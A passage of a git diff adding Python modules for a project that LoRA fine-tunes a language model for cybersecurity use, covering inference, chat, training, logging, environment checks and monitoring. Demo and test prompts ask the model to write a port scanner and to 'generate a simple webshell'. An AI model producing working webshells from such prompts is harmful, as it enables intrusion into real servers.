+                if msg["role"] == "system":
+                    prompt += f"系统: {msg['content']}\n"
+                elif msg["role"] == "user":
+                    prompt += f"用户: {msg['content']}\n"
+                elif msg["role"] == "assistant":
+                    prompt += f"助手: {msg['content']}\n"
+            prompt += "助手: "
+        
+        # 使用模型配置的生成参数
+        gen_config = self.adapter.get_generation_config()
+        response = self.generate_response(
+            prompt, 
+            max_length=gen_config.get('max_new_tokens', 512),
+            temperature=gen_config.get('temperature', 0.7),
+            top_p=gen_config.get('top_p', 0.9)
+        )
+        
+        # 更新历史
+        history.append({
+            "user": message,
+            "assistant": response
+        })
+        
+        return response, history
+    
+    def batch_inference(self, prompts: List[str], **kwargs) -> List[str]:
+        """批量推理"""
+        results = []
+        
+        for prompt in prompts:
+            try:
+                response = self.generate_response(prompt, **kwargs)
+                results.append(response)
+            except Exception as e:
+                self.logger.error(f"推理失败: {prompt[:50]}... - {e}")
+                results.append(f"推理失败: {str(e)}")
+        
+        return results
+    
+    def security_demo(self) -> List[Dict[str, str]]:
+        """网络安全功能演示"""
+        demo_prompts = [
+            "如何进行网络渗透测试?",
+            "编写一个简单的端口扫描脚本",
+            "解释SQL注入攻击的原理和防护方法",
+            "生成一个简单的webshell代码",
+            "如何检测和防护XSS攻击?",
+            "编写一个网络数据包捕获程序"
+        ]
+        
+        results = []
+        
+        for prompt in demo_prompts:
+            self.logger.info(f"演示: {prompt}")
+            response = self.generate_response(prompt)
+            
+            results.append({
+                "prompt": prompt,
+                "response": response
+            })
+            
+            print(f"\n问题: {prompt}")
+            print(f"回答: {response}")
+            print("-" * 80)
+        
+        return results
+    
+    def interactive_chat(self) -> None:
+        """交互式对话"""
+        print("网络安全模型交互式对话")
+        print("输入 'quit' 或 'exit' 退出")
+        print("-" * 50)
+        
+        history = []
+        
+        while True:
+            try:
+                user_input = input("\n用户: ").strip()
+                
+                if user_input.lower() in ['quit', 'exit', '退出']:
+                    print("再见!")
+                    break
+                
+                if not user_input:
+                    continue
+                
+                response, history = self.chat(user_input, history)
+                print(f"助手: {response}")
+                
+            except KeyboardInterrupt:
+                print("\n再见!")
+                break
+            except Exception as e:
+                print(f"错误: {e}")
+    
+    def get_model_info(self) -> Dict[str, Any]:
+        """获取模型信息"""
+        if self.model is None:
+            return {"loaded": False}
+        
+        # 计算参数数量
+        total_params = sum(p.numel() for p in self.model.parameters())
+        trainable_params = sum(p.numel() for p in self.model.parameters() if p.requires_grad)
+        
+        info = {
+            "loaded": True,
+            "device": self.device,
+            "total_parameters": total_params,
+            "trainable_parameters": trainable_params,
+            "model_type": type(self.model).__name__,
+            "tokenizer_vocab_size": len(self.tokenizer) if self.tokenizer else 0
+        }
+        
+        # 检查是否是PEFT模型
+        if hasattr(self.model, 'peft_config'):
+            info["is_peft_model"] = True
+            info["peft_type"] = str(type(self.model.peft_config))
+        else:
+            info["is_peft_model"] = False
+        
+        return info

+ 293 - 0
src/model/trainer.py

@@ -0,0 +1,293 @@
+# -*- coding: utf-8 -*-
+"""
+模型训练器模块
+
+负责模型的训练和微调。
+"""
+
+import torch
+from pathlib import Path
+from typing import Optional
+from transformers import (
+    AutoTokenizer, AutoModelForCausalLM,
+    TrainingArguments, Trainer,
+    DataCollatorForLanguageModeling,
+    BitsAndBytesConfig
+)
+from peft import LoraConfig, get_peft_model, TaskType
+
+from ..config import Config, TrainingConfig
+from ..data import DataLoader
+from ..utils.logger import get_logger
+from .downloader import ModelDownloader
+from .adapters import ModelAdapterFactory
+
+
+class SecurityModelTrainer:
+    """网络安全模型训练器"""
+    
+    def __init__(self, config: Config = None, training_config: TrainingConfig = None, model_key: str = None):
+        self.config = config or Config()
+        self.training_config = training_config or TrainingConfig()
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 设置当前模型
+        if model_key:
+            self.config.set_current_model(model_key)
+        
+        # 获取模型配置和适配器
+        self.model_config = self.config.get_current_model_config()
+        self.adapter = ModelAdapterFactory.create_adapter(self.model_config)
+        
+        self.model = None
+        self.tokenizer = None
+        self.trainer = None
+        
+        # 初始化组件
+        self.model_downloader = ModelDownloader(self.config)
+        self.data_loader = DataLoader(self.config)
+    
+    def setup_model(self, model_name: Optional[str] = None) -> None:
+        """设置模型和分词器"""
+        if model_name is None:
+            model_name = self.config.get_current_model_key()
+        
+        # 确保模型已下载
+        model_path = self.model_downloader.download_model(model_name)
+
+        # 检查模型路径是否存在且不为空
+        if not model_path.exists() or not any(model_path.iterdir()):
+            self.logger.error(f"模型目录不存在或为空: {model_path}")
+            raise FileNotFoundError(f"模型目录不存在或为空: {model_path}")
+        
+        self.logger.info(f"加载模型: {model_path}")
+        
+        # 加载分词器
+        self.tokenizer = AutoTokenizer.from_pretrained(
+            str(model_path),
+            trust_remote_code=True,
+            padding_side="right"
+        )
+        
+        # 使用适配器设置分词器
+        self.tokenizer = self.adapter.setup_tokenizer(self.tokenizer)
+        
+        # 配置8位量化以节省显存
+        quantization_config = BitsAndBytesConfig(
+            load_in_8bit=True,
+            llm_int8_threshold=6.0,
+            llm_int8_has_fp16_weight=False,
+        )
+        
+        # 加载模型
+        if self.model_config.quantization_compatible:
+            self.model = AutoModelForCausalLM.from_pretrained(
+                str(model_path),
+                trust_remote_code=True,
+                quantization_config=quantization_config,
+                device_map="auto",
+                torch_dtype=torch.float16 if self.training_config.fp16 else torch.float32
+            )
+        else:
+            self.model = AutoModelForCausalLM.from_pretrained(
+                str(model_path),
+                trust_remote_code=True,
+                device_map="auto",
+                torch_dtype=torch.float16 if self.training_config.fp16 else torch.float32
+            )
+        
+        # 使用适配器设置模型
+        self.model = self.adapter.setup_model(self.model)
+        
+        self.logger.info("模型已加载并配置8位量化")
+        
+        # 应用LoRA
+        if self.training_config.use_lora and self.model_config.lora_compatible:
+            self._apply_lora()
+        
+        self.logger.info("模型设置完成")
+    
+    def _apply_lora(self) -> None:
+        """应用LoRA微调"""
+        # 使用模型特定的目标模块
+        lora_config_dict = self.training_config.lora_config.to_peft_config_dict()
+        if self.model_config.lora_target_modules:
+            lora_config_dict['target_modules'] = self.model_config.lora_target_modules
+        
+        lora_config = LoraConfig(
+            task_type=TaskType.CAUSAL_LM,
+            **lora_config_dict
+        )
+        
+        self.model = get_peft_model(self.model, lora_config)
+        
+        # 确保模型处于训练模式
+        self.model.train()
+        
+        # 启用梯度检查点(如果配置了)
+        if self.training_config.gradient_checkpointing:
+            self.model.gradient_checkpointing_enable()
+        
+        self.model.print_trainable_parameters()
+        
+        self.logger.info("LoRA配置已应用")
+    
+    def prepare_training(self, data_file: Optional[str] = None) -> None:
+        """准备训练"""
+        if self.model is None or self.tokenizer is None:
+            raise ValueError("请先调用 setup_model() 设置模型")
+        
+        # 准备数据集
+        self.train_dataset, self.eval_dataset = self.data_loader.prepare_datasets(
+            self.tokenizer, data_file
+        )
+        
+        # 设置训练参数
+        training_args = TrainingArguments(
+            output_dir=str(self.config.CHECKPOINTS_DIR),
+            **self.training_config.to_training_arguments_dict()
+        )
+        
+        # 数据整理器
+        data_collator = DataCollatorForLanguageModeling(
+            tokenizer=self.tokenizer,
+            mlm=False
+        )
+        
+        # 创建训练器
+        self.trainer = Trainer(
+            model=self.model,
+            args=training_args,
+            train_dataset=self.train_dataset,
+            eval_dataset=self.eval_dataset,
+            data_collator=data_collator,
+            tokenizer=self.tokenizer
+        )
+        
+        self.logger.info("训练准备完成")
+    
+    def train(self) -> None:
+        """开始训练"""
+        if self.trainer is None:
+            raise ValueError("请先调用 prepare_training() 准备训练")
+        
+        self.logger.info("开始模型训练...")
+        
+        # 开始训练
+        self.trainer.train()
+        
+        self.logger.info("模型训练完成")
+    
+    def save_model(self, output_dir: Optional[str] = None) -> Path:
+        """保存模型"""
+        if self.model is None:
+            raise ValueError("没有可保存的模型")
+        
+        if output_dir is None:
+            output_dir = self.config.OUTPUT_DIR / "final_model"
+        else:
+            output_dir = Path(output_dir)
+        
+        output_dir.mkdir(parents=True, exist_ok=True)
+        
+        # 保存模型
+        if hasattr(self.model, 'save_pretrained'):
+            self.model.save_pretrained(str(output_dir))
+        
+        # 保存分词器
+        if self.tokenizer is not None:
+            self.tokenizer.save_pretrained(str(output_dir))
+        
+        self.logger.info(f"模型已保存到: {output_dir}")
+        return output_dir
+    
+    def evaluate(self) -> dict:
+        """评估模型"""
+        if self.trainer is None:
+            raise ValueError("请先调用 prepare_training() 准备训练")
+        
+        self.logger.info("开始模型评估...")
+        
+        eval_results = self.trainer.evaluate()
+        
+        self.logger.info(f"评估结果: {eval_results}")
+        return eval_results
+    
+    def test_model(self, test_prompts: Optional[list] = None) -> list:
+        """测试模型"""
+        if self.model is None or self.tokenizer is None:
+            raise ValueError("请先设置模型")
+        
+        if test_prompts is None:
+            test_prompts = [
+                "如何进行网络安全渗透测试?",
+                "编写一个简单的端口扫描脚本",
+                "解释SQL注入攻击的原理"
+            ]
+        
+        results = []
+        
+        for prompt in test_prompts:
+            self.logger.info(f"测试提示: {prompt}")
+            
+            # 编码输入
+            inputs = self.tokenizer(
+                prompt,
+                return_tensors="pt",
+                padding=True,
+                truncation=True
+            )
+            
+            # 移动到设备
+            if torch.cuda.is_available():
+                inputs = {k: v.cuda() for k, v in inputs.items()}
+            
+            # 生成回复
+            with torch.no_grad():
+                outputs = self.model.generate(
+                    **inputs,
+                    max_new_tokens=200,
+                    temperature=0.7,
+                    do_sample=True,
+                    pad_token_id=self.tokenizer.eos_token_id
+                )
+            
+            # 解码输出
+            response = self.tokenizer.decode(
+                outputs[0][inputs['input_ids'].shape[1]:],
+                skip_special_tokens=True
+            )
+            
+            result = {
+                "prompt": prompt,
+                "response": response.strip()
+            }
+            
+            results.append(result)
+            self.logger.info(f"回复: {response.strip()}")
+        
+        return results
+    
+    def get_training_info(self) -> dict:
+        """获取训练信息"""
+        info = {
+            "model_loaded": self.model is not None,
+            "tokenizer_loaded": self.tokenizer is not None,
+            "trainer_ready": self.trainer is not None,
+            "config": {
+                "base_model": self.config.BASE_MODEL_NAME,
+                "use_lora": self.training_config.use_lora,
+                "fp16": self.training_config.fp16,
+                "batch_size": self.training_config.batch_size,
+                "learning_rate": self.training_config.learning_rate,
+                "num_epochs": self.training_config.num_epochs
+            }
+        }
+        
+        if hasattr(self, 'train_dataset'):
+            info["train_dataset_size"] = len(self.train_dataset)
+        
+        if hasattr(self, 'eval_dataset'):
+            info["eval_dataset_size"] = len(self.eval_dataset)
+        
+        return info

+ 17 - 0
src/utils/__init__.py

@@ -0,0 +1,17 @@
+# -*- coding: utf-8 -*-
+"""
+工具模块
+
+提供日志、环境检查、监控等工具功能。
+"""
+
+from .logger import get_logger, setup_logging
+from .environment import EnvironmentChecker
+from .monitor import TrainingMonitor
+
+__all__ = [
+    "get_logger",
+    "setup_logging",
+    "EnvironmentChecker",
+    "TrainingMonitor"
+]

BIN
src/utils/__pycache__/__init__.cpython-310.pyc


BIN
src/utils/__pycache__/environment.cpython-310.pyc


BIN
src/utils/__pycache__/logger.cpython-310.pyc


BIN
src/utils/__pycache__/monitor.cpython-310.pyc


+ 350 - 0
src/utils/environment.py

@@ -0,0 +1,350 @@
+# -*- coding: utf-8 -*-
+"""
+环境检查工具模块
+
+负责检查训练环境的各项配置。
+"""
+
+import os
+import sys
+import shutil
+import subprocess
+from pathlib import Path
+from typing import Dict, List, Tuple, Any
+
+from .logger import get_logger
+
+
+class EnvironmentChecker:
+    """环境检查器"""
+    
+    def __init__(self):
+        self.logger = get_logger(self.__class__.__name__)
+        self.check_results = {}
+    
+    def check_all(self) -> Dict[str, Any]:
+        """执行所有环境检查"""
+        self.logger.info("开始环境检查...")
+        
+        checks = [
+            ("python_version", self.check_python_version),
+            ("cuda_availability", self.check_cuda),
+            ("gpu_memory", self.check_gpu_memory),
+            ("disk_space", self.check_disk_space),
+            ("system_memory", self.check_system_memory),
+            ("required_packages", self.check_required_packages),
+            ("network_connectivity", self.check_network),
+            ("directory_permissions", self.check_directory_permissions)
+        ]
+        
+        for check_name, check_func in checks:
+            try:
+                result = check_func()
+                self.check_results[check_name] = result
+                status = "✓" if result.get("status", False) else "✗"
+                self.logger.info(f"{status} {check_name}: {result.get('message', '')}")
+            except Exception as e:
+                self.check_results[check_name] = {
+                    "status": False,
+                    "message": f"检查失败: {str(e)}"
+                }
+                self.logger.error(f"✗ {check_name}: 检查失败 - {e}")
+        
+        # 生成总结
+        self._generate_summary()
+        
+        return self.check_results
+    
+    def check_python_version(self) -> Dict[str, Any]:
+        """检查Python版本"""
+        version = sys.version_info
+        version_str = f"{version.major}.{version.minor}.{version.micro}"
+        
+        # 要求Python 3.8+
+        is_valid = version >= (3, 8)
+        
+        return {
+            "status": is_valid,
+            "version": version_str,
+            "message": f"Python {version_str}" + ("" if is_valid else " (需要 3.8+)")
+        }
+    
+    def check_cuda(self) -> Dict[str, Any]:
+        """检查CUDA可用性"""
+        try:
+            import torch
+            
+            cuda_available = torch.cuda.is_available()
+            
+            if cuda_available:
+                device_count = torch.cuda.device_count()
+                device_name = torch.cuda.get_device_name(0)
+                cuda_version = torch.version.cuda
+                
+                return {
+                    "status": True,
+                    "device_count": device_count,
+                    "device_name": device_name,
+                    "cuda_version": cuda_version,
+                    "message": f"CUDA {cuda_version}, {device_count} GPU(s), {device_name}"
+                }
+            else:
+                return {
+                    "status": False,
+                    "message": "CUDA不可用,将使用CPU训练"
+                }
+        except ImportError:
+            return {
+                "status": False,
+                "message": "PyTorch未安装"
+            }
+    
+    def check_gpu_memory(self) -> Dict[str, Any]:
+        """检查GPU内存"""
+        try:
+            import torch
+            
+            if not torch.cuda.is_available():
+                return {
+                    "status": False,
+                    "message": "无GPU可用"
+                }
+            
+            device = torch.cuda.current_device()
+            total_memory = torch.cuda.get_device_properties(device).total_memory
+            total_gb = total_memory / (1024**3)
+            
+            # 检查可用内存
+            torch.cuda.empty_cache()
+            allocated = torch.cuda.memory_allocated(device)
+            cached = torch.cuda.memory_reserved(device)
+            free_memory = total_memory - max(allocated, cached)
+            free_gb = free_memory / (1024**3)
+            
+            # 至少需要4GB可用内存
+            is_sufficient = free_gb >= 4.0
+            
+            return {
+                "status": is_sufficient,
+                "total_gb": round(total_gb, 2),
+                "free_gb": round(free_gb, 2),
+                "message": f"总内存: {total_gb:.1f}GB, 可用: {free_gb:.1f}GB" + 
+                          ("" if is_sufficient else " (建议至少4GB)")
+            }
+        except Exception as e:
+            return {
+                "status": False,
+                "message": f"GPU内存检查失败: {str(e)}"
+            }
+    
+    def check_disk_space(self) -> Dict[str, Any]:
+        """检查磁盘空间"""
+        try:
+            current_dir = Path.cwd()
+            total, used, free = shutil.disk_usage(current_dir)
+            
+            free_gb = free / (1024**3)
+            total_gb = total / (1024**3)
+            
+            # 至少需要10GB可用空间
+            is_sufficient = free_gb >= 10.0
+            
+            return {
+                "status": is_sufficient,
+                "total_gb": round(total_gb, 2),
+                "free_gb": round(free_gb, 2),
+                "message": f"总空间: {total_gb:.1f}GB, 可用: {free_gb:.1f}GB" +
+                          ("" if is_sufficient else " (建议至少10GB)")
+            }
+        except Exception as e:
+            return {
+                "status": False,
+                "message": f"磁盘空间检查失败: {str(e)}"
+            }
+    
+    def check_system_memory(self) -> Dict[str, Any]:
+        """检查系统内存"""
+        try:
+            import psutil
+            
+            memory = psutil.virtual_memory()
+            total_gb = memory.total / (1024**3)
+            available_gb = memory.available / (1024**3)
+            
+            # 至少需要8GB总内存
+            is_sufficient = total_gb >= 8.0
+            
+            return {
+                "status": is_sufficient,
+                "total_gb": round(total_gb, 2),
+                "available_gb": round(available_gb, 2),
+                "usage_percent": memory.percent,
+                "message": f"总内存: {total_gb:.1f}GB, 可用: {available_gb:.1f}GB" +
+                          ("" if is_sufficient else " (建议至少8GB)")
+            }
+        except ImportError:
+            return {
+                "status": False,
+                "message": "psutil未安装,无法检查系统内存"
+            }
+        except Exception as e:
+            return {
+                "status": False,
+                "message": f"系统内存检查失败: {str(e)}"
+            }
+    
+    def check_required_packages(self) -> Dict[str, Any]:
+        """检查必需的Python包"""
+        required_packages = [
+            "torch", "transformers", "datasets", "peft",
+            "accelerate", "bitsandbytes", "tqdm", "psutil"
+        ]
+        
+        missing_packages = []
+        installed_packages = []
+        
+        for package in required_packages:
+            try:
+                __import__(package)
+                installed_packages.append(package)
+            except ImportError:
+                missing_packages.append(package)
+        
+        is_complete = len(missing_packages) == 0
+        
+        message = f"已安装: {len(installed_packages)}/{len(required_packages)}"
+        if missing_packages:
+            message += f", 缺失: {', '.join(missing_packages)}"
+        
+        return {
+            "status": is_complete,
+            "installed": installed_packages,
+            "missing": missing_packages,
+            "message": message
+        }
+    
+    def check_network(self) -> Dict[str, Any]:
+        """检查网络连接"""
+        test_urls = [
+            ("HuggingFace", "https://huggingface.co"),
+            ("ModelScope", "https://modelscope.cn")
+        ]
+        
+        connectivity_results = {}
+        
+        for name, url in test_urls:
+            try:
+                import urllib.request
+                urllib.request.urlopen(url, timeout=10)
+                connectivity_results[name] = True
+            except Exception:
+                connectivity_results[name] = False
+        
+        any_connected = any(connectivity_results.values())
+        
+        status_msg = ", ".join([
+            f"{name}: {'✓' if status else '✗'}"
+            for name, status in connectivity_results.items()
+        ])
+        
+        return {
+            "status": any_connected,
+            "connectivity": connectivity_results,
+            "message": status_msg
+        }
+    
+    def check_directory_permissions(self) -> Dict[str, Any]:
+        """检查目录权限"""
+        test_dirs = [
+            Path.cwd(),
+            Path.cwd() / "data",
+            Path.cwd() / "models",
+            Path.cwd() / "logs",
+            Path.cwd() / "output"
+        ]
+        
+        permission_results = {}
+        
+        for dir_path in test_dirs:
+            try:
+                # 创建目录(如果不存在)
+                dir_path.mkdir(parents=True, exist_ok=True)
+                
+                # 测试写入权限
+                test_file = dir_path / ".permission_test"
+                test_file.write_text("test")
+                test_file.unlink()
+                
+                permission_results[str(dir_path)] = True
+            except Exception:
+                permission_results[str(dir_path)] = False
+        
+        all_writable = all(permission_results.values())
+        
+        failed_dirs = [
+            path for path, writable in permission_results.items()
+            if not writable
+        ]
+        
+        message = "所有目录可写" if all_writable else f"无法写入: {', '.join(failed_dirs)}"
+        
+        return {
+            "status": all_writable,
+            "permissions": permission_results,
+            "message": message
+        }
+    
+    def _generate_summary(self) -> None:
+        """生成检查总结"""
+        total_checks = len(self.check_results)
+        passed_checks = sum(1 for result in self.check_results.values() if result.get("status", False))
+        
+        self.logger.info(f"\n环境检查完成: {passed_checks}/{total_checks} 项通过")
+        
+        if passed_checks == total_checks:
+            self.logger.info("✓ 环境检查全部通过,可以开始训练")
+        else:
+            self.logger.warning("⚠ 部分环境检查未通过,可能影响训练效果")
+            
+            # 列出失败的检查
+            failed_checks = [
+                name for name, result in self.check_results.items()
+                if not result.get("status", False)
+            ]
+            
+            self.logger.warning(f"失败的检查项: {', '.join(failed_checks)}")
+    
+    def get_recommendations(self) -> List[str]:
+        """获取环境改进建议"""
+        recommendations = []
+        
+        # Python版本建议
+        if not self.check_results.get("python_version", {}).get("status", False):
+            recommendations.append("升级Python到3.8或更高版本")
+        
+        # CUDA建议
+        if not self.check_results.get("cuda_availability", {}).get("status", False):
+            recommendations.append("安装CUDA和PyTorch GPU版本以加速训练")
+        
+        # 内存建议
+        gpu_memory = self.check_results.get("gpu_memory", {})
+        if gpu_memory.get("status") is False and "free_gb" in gpu_memory:
+            if gpu_memory["free_gb"] < 4:
+                recommendations.append("释放GPU内存或使用更小的batch size")
+        
+        # 磁盘空间建议
+        disk_space = self.check_results.get("disk_space", {})
+        if not disk_space.get("status", False):
+            recommendations.append("清理磁盘空间,至少保留10GB可用空间")
+        
+        # 包安装建议
+        packages = self.check_results.get("required_packages", {})
+        if packages.get("missing"):
+            missing = ", ".join(packages["missing"])
+            recommendations.append(f"安装缺失的包: pip install {missing}")
+        
+        # 网络建议
+        if not self.check_results.get("network_connectivity", {}).get("status", False):
+            recommendations.append("检查网络连接,确保可以访问模型下载源")
+        
+        return recommendations

+ 174 - 0
src/utils/logger.py

@@ -0,0 +1,174 @@
+# -*- coding: utf-8 -*-
+"""
+日志工具模块
+
+提供统一的日志管理功能。
+"""
+
+import logging
+import sys
+from pathlib import Path
+from typing import Optional
+from datetime import datetime
+
+
+def setup_logging(log_dir: Optional[Path] = None, log_level: str = "INFO") -> None:
+    """设置日志配置"""
+    if log_dir is None:
+        log_dir = Path("logs")
+    
+    log_dir.mkdir(parents=True, exist_ok=True)
+    
+    # 生成日志文件名
+    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
+    log_file = log_dir / f"training_{timestamp}.log"
+    
+    # 配置日志格式
+    formatter = logging.Formatter(
+        '%(asctime)s - %(name)s - %(levelname)s - %(message)s',
+        datefmt='%Y-%m-%d %H:%M:%S'
+    )
+    
+    # 配置根日志器
+    root_logger = logging.getLogger()
+    root_logger.setLevel(getattr(logging, log_level.upper()))
+    
+    # 清除现有处理器
+    root_logger.handlers.clear()
+    
+    # 文件处理器
+    file_handler = logging.FileHandler(log_file, encoding='utf-8')
+    file_handler.setFormatter(formatter)
+    root_logger.addHandler(file_handler)
+    
+    # 控制台处理器
+    console_handler = logging.StreamHandler(sys.stdout)
+    console_handler.setFormatter(formatter)
+    root_logger.addHandler(console_handler)
+    
+    # 记录日志配置信息
+    root_logger.info(f"日志系统已初始化,日志文件: {log_file}")
+
+
+def get_logger(name: str) -> logging.Logger:
+    """获取日志器"""
+    return logging.getLogger(name)
+
+
+class TrainingLogger:
+    """训练日志器"""
+    
+    def __init__(self, log_dir: Optional[Path] = None):
+        self.log_dir = log_dir or Path("logs")
+        self.log_dir.mkdir(parents=True, exist_ok=True)
+        
+        self.logger = get_logger("TrainingLogger")
+        
+        # 训练指标日志文件
+        self.metrics_file = self.log_dir / "training_metrics.log"
+    
+    def log_epoch_start(self, epoch: int, total_epochs: int) -> None:
+        """记录训练轮次开始"""
+        self.logger.info(f"开始第 {epoch}/{total_epochs} 轮训练")
+    
+    def log_epoch_end(self, epoch: int, metrics: dict) -> None:
+        """记录训练轮次结束"""
+        self.logger.info(f"第 {epoch} 轮训练完成")
+        
+        # 记录指标
+        for key, value in metrics.items():
+            self.logger.info(f"{key}: {value}")
+        
+        # 保存到指标文件
+        self._save_metrics(epoch, metrics)
+    
+    def log_step(self, step: int, loss: float, lr: float = None) -> None:
+        """记录训练步骤"""
+        msg = f"Step {step}: loss={loss:.4f}"
+        if lr is not None:
+            msg += f", lr={lr:.2e}"
+        
+        self.logger.info(msg)
+    
+    def log_evaluation(self, metrics: dict) -> None:
+        """记录评估结果"""
+        self.logger.info("评估结果:")
+        for key, value in metrics.items():
+            self.logger.info(f"  {key}: {value}")
+    
+    def log_model_info(self, info: dict) -> None:
+        """记录模型信息"""
+        self.logger.info("模型信息:")
+        for key, value in info.items():
+            self.logger.info(f"  {key}: {value}")
+    
+    def log_data_info(self, info: dict) -> None:
+        """记录数据信息"""
+        self.logger.info("数据信息:")
+        for key, value in info.items():
+            self.logger.info(f"  {key}: {value}")
+    
+    def log_error(self, error: Exception, context: str = "") -> None:
+        """记录错误"""
+        if context:
+            self.logger.error(f"{context}: {str(error)}")
+        else:
+            self.logger.error(str(error))
+        
+        # 记录详细错误信息
+        self.logger.exception("详细错误信息:")
+    
+    def _save_metrics(self, epoch: int, metrics: dict) -> None:
+        """保存训练指标到文件"""
+        timestamp = datetime.now().isoformat()
+        
+        with open(self.metrics_file, 'a', encoding='utf-8') as f:
+            f.write(f"{timestamp},epoch={epoch}")
+            for key, value in metrics.items():
+                f.write(f",{key}={value}")
+            f.write("\n")
+    
+    def get_latest_metrics(self, num_lines: int = 10) -> list:
+        """获取最新的训练指标"""
+        if not self.metrics_file.exists():
+            return []
+        
+        with open(self.metrics_file, 'r', encoding='utf-8') as f:
+            lines = f.readlines()
+        
+        return lines[-num_lines:] if lines else []
+
+
+class ProgressLogger:
+    """进度日志器"""
+    
+    def __init__(self, total_steps: int, log_interval: int = 100):
+        self.total_steps = total_steps
+        self.log_interval = log_interval
+        self.current_step = 0
+        
+        self.logger = get_logger("ProgressLogger")
+        self.start_time = datetime.now()
+    
+    def update(self, step: int, loss: float = None, **kwargs) -> None:
+        """更新进度"""
+        self.current_step = step
+        
+        if step % self.log_interval == 0 or step == self.total_steps:
+            progress = (step / self.total_steps) * 100
+            elapsed = datetime.now() - self.start_time
+            
+            msg = f"进度: {step}/{self.total_steps} ({progress:.1f}%), 耗时: {elapsed}"
+            
+            if loss is not None:
+                msg += f", 损失: {loss:.4f}"
+            
+            for key, value in kwargs.items():
+                msg += f", {key}: {value}"
+            
+            self.logger.info(msg)
+    
+    def finish(self) -> None:
+        """完成进度记录"""
+        total_time = datetime.now() - self.start_time
+        self.logger.info(f"训练完成,总耗时: {total_time}")

+ 349 - 0
src/utils/monitor.py

@@ -0,0 +1,349 @@
+# -*- coding: utf-8 -*-
+"""
+训练监控工具模块
+
+负责监控训练进度、系统状态和资源使用情况。
+"""
+
+import time
+import json
+from pathlib import Path
+from typing import Dict, List, Optional, Any
+from datetime import datetime, timedelta
+from dataclasses import dataclass
+
+from .logger import get_logger
+
+
+@dataclass
+class SystemStatus:
+    """系统状态数据类"""
+    timestamp: str
+    cpu_percent: float
+    memory_percent: float
+    memory_used_gb: float
+    memory_total_gb: float
+    disk_used_percent: float
+    disk_free_gb: float
+    gpu_memory_used_gb: float = 0.0
+    gpu_memory_total_gb: float = 0.0
+    gpu_utilization: float = 0.0
+    gpu_temperature: float = 0.0
+
+
+@dataclass
+class TrainingStatus:
+    """训练状态数据类"""
+    timestamp: str
+    epoch: int
+    step: int
+    loss: float
+    learning_rate: float
+    progress_percent: float
+    estimated_time_remaining: str
+    samples_per_second: float = 0.0
+
+
+class TrainingMonitor:
+    """训练监控器"""
+    
+    def __init__(self, log_dir: Optional[Path] = None, 
+                 monitor_interval: int = 30):
+        self.log_dir = log_dir or Path("logs")
+        self.log_dir.mkdir(parents=True, exist_ok=True)
+        
+        self.monitor_interval = monitor_interval
+        self.logger = get_logger(self.__class__.__name__)
+        
+        # 监控数据文件
+        self.system_log_file = self.log_dir / "system_monitor.jsonl"
+        self.training_log_file = self.log_dir / "training_monitor.jsonl"
+        
+        # 状态缓存
+        self.last_system_status = None
+        self.last_training_status = None
+        
+        # 训练开始时间
+        self.training_start_time = None
+        
+        self.logger.info(f"训练监控器已初始化,监控间隔: {monitor_interval}秒")
+    
+    def start_monitoring(self) -> None:
+        """开始监控"""
+        self.training_start_time = datetime.now()
+        self.logger.info("开始训练监控")
+    
+    def stop_monitoring(self) -> None:
+        """停止监控"""
+        if self.training_start_time:
+            total_time = datetime.now() - self.training_start_time
+            self.logger.info(f"训练监控结束,总时长: {total_time}")
+    
+    def collect_system_status(self) -> SystemStatus:
+        """收集系统状态"""
+        try:
+            import psutil
+            
+            # CPU和内存信息
+            cpu_percent = psutil.cpu_percent(interval=1)
+            memory = psutil.virtual_memory()
+            disk = psutil.disk_usage('/')
+            
+            status = SystemStatus(
+                timestamp=datetime.now().isoformat(),
+                cpu_percent=cpu_percent,
+                memory_percent=memory.percent,
+                memory_used_gb=memory.used / (1024**3),
+                memory_total_gb=memory.total / (1024**3),
+                disk_used_percent=(disk.used / disk.total) * 100,
+                disk_free_gb=disk.free / (1024**3)
+            )
+            
+            # GPU信息(如果可用)
+            try:
+                import torch
+                if torch.cuda.is_available():
+                    device = torch.cuda.current_device()
+                    gpu_memory_used = torch.cuda.memory_allocated(device)
+                    gpu_memory_total = torch.cuda.get_device_properties(device).total_memory
+                    
+                    status.gpu_memory_used_gb = gpu_memory_used / (1024**3)
+                    status.gpu_memory_total_gb = gpu_memory_total / (1024**3)
+                    status.gpu_utilization = (gpu_memory_used / gpu_memory_total) * 100
+                    
+                    # 尝试获取GPU温度(需要nvidia-ml-py)
+                    try:
+                        import pynvml
+                        pynvml.nvmlInit()
+                        handle = pynvml.nvmlDeviceGetHandleByIndex(0)
+                        temp = pynvml.nvmlDeviceGetTemperature(handle, pynvml.NVML_TEMPERATURE_GPU)
+                        status.gpu_temperature = temp
+                    except:
+                        pass
+            except:
+                pass
+            
+            self.last_system_status = status
+            return status
+            
+        except ImportError:
+            self.logger.warning("psutil未安装,无法收集系统状态")
+            return None
+        except Exception as e:
+            self.logger.error(f"收集系统状态失败: {e}")
+            return None
+    
+    def log_training_step(self, epoch: int, step: int, loss: float, 
+                         learning_rate: float, total_steps: int) -> None:
+        """记录训练步骤"""
+        progress_percent = (step / total_steps) * 100 if total_steps > 0 else 0
+        
+        # 估算剩余时间
+        estimated_time = "未知"
+        samples_per_second = 0.0
+        
+        if self.training_start_time and step > 0:
+            elapsed_time = datetime.now() - self.training_start_time
+            time_per_step = elapsed_time.total_seconds() / step
+            remaining_steps = total_steps - step
+            remaining_seconds = time_per_step * remaining_steps
+            
+            estimated_time = str(timedelta(seconds=int(remaining_seconds)))
+            samples_per_second = step / elapsed_time.total_seconds()
+        
+        status = TrainingStatus(
+            timestamp=datetime.now().isoformat(),
+            epoch=epoch,
+            step=step,
+            loss=loss,
+            learning_rate=learning_rate,
+            progress_percent=progress_percent,
+            estimated_time_remaining=estimated_time,
+            samples_per_second=samples_per_second
+        )
+        
+        self.last_training_status = status
+        
+        # 保存到文件
+        self._save_training_status(status)
+        
+        # 定期收集系统状态
+        if step % (self.monitor_interval // 10) == 0:  # 更频繁的系统监控
+            system_status = self.collect_system_status()
+            if system_status:
+                self._save_system_status(system_status)
+    
+    def _save_system_status(self, status: SystemStatus) -> None:
+        """保存系统状态到文件"""
+        try:
+            with open(self.system_log_file, 'a', encoding='utf-8') as f:
+                f.write(json.dumps(status.__dict__, ensure_ascii=False) + '\n')
+        except Exception as e:
+            self.logger.error(f"保存系统状态失败: {e}")
+    
+    def _save_training_status(self, status: TrainingStatus) -> None:
+        """保存训练状态到文件"""
+        try:
